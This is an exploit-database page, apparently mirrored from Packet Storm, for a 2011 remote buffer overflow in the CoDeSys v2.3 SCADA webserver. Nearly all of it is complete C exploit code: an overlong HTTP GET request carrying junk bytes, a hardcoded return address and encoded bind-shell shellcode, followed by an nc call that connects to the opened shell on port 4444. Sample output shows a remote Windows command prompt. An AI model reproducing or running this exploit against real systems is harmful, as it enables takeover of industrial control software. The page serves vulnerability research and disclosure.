Lucene search
K

CoDeSys 2.3 Buffer Overflow

🗓️ 01 Dec 2011 00:00:00Reported by Celil UnuverType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

CoDeSys 2.3 Buffer Overflow in Industrial Control Syste

Code
`/*  
CoDeSys v2.3 Industrial Control System Development Software  
Remote Buffer Overflow Exploit for CoDeSys Scada webserver  
Author : Celil UNUVER, SignalSEC Labs  
www.signalsec.com  
Tested on WinXP SP1 EN  
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!  
--snip--  
  
root@bt:~# ./codesys 192.168.1.36  
  
CoDeSys v2.3 webserver Remote Exploit  
by SignalSEC Labs - www.signalsec.com  
  
[+]Sending payload to SCADA system!  
  
[+]Connecting to port 4444 to get shell!  
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out  
(UNKNOWN) [192.168.1.36] 4444 (?) open  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\Program Files\3S Software\CoDeSys V2.3\visu>   
  
--snip--  
  
*/  
  
#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <unistd.h>  
  
#define name "CoDeSys v2.3 webserver Remote Exploit"  
#define PORT 8080  
#define JUNK "A"  
  
int main ( int argc, char *argv[] )  
{  
  
  
int sock, i, payload;  
  
struct sockaddr_in dest_addr;  
  
char *target = "target";  
  
char request[1600], *ptr;  
  
  
char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll  
  
char hellcode[] =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"  
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"  
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"  
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"  
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"  
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"  
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"  
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"  
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"  
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"  
"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"  
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"  
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"  
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"  
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"  
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"  
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"  
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"  
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"  
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"  
"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"  
"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"  
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"  
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"  
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"  
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"  
"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"  
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"  
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"  
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"  
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"  
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"  
"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"  
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"  
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"  
"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"  
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"  
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"  
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"  
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"  
"\x4f\x4f\x42\x4d\x5a";  
  
printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name);  
  
if (argc < 2)  
{  
printf ("\nUsage: codesys [IP]\n");  
exit (-1);  
}  
  
setenv (target, argv[1], 1);  
  
  
memset (request, '\0', sizeof (request));  
ptr = request;  
strcat (request, "GET /");  
  
for(i = 1; i < 776; i++){  
  
strcat (request, JUNK);  
}  
  
strcat (request, ret);  
strcat (request, hellcode);  
strcat (request, " HTTP/1.1");  
strcat (request, "\r\n");  
  
  
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){  
perror("\nsocket error\n");  
exit (1);  
}  
  
dest_addr.sin_family = AF_INET;  
dest_addr.sin_port = htons(PORT);  
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {  
perror("inet_aton problems");  
exit (2);  
}  
  
memset( &(dest_addr.sin_zero), '\0', 8);  
  
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){  
perror("\nCouldnt connect to target!\n");  
close (sock);  
exit (3);  
}  
  
payload = (send (sock, ptr, strlen(request), 0));  
if (payload == -1) {  
perror("\nCan not send the payload\n");  
close (sock);  
exit(4);  
}  
close (sock);  
printf ("\n[+]Sending payload to SCADA system!\n");  
sleep (1);  
printf ("\n[+]Connecting to port 4444 to get shell!\n");  
sleep (2);  
system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");  
exit (0);  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation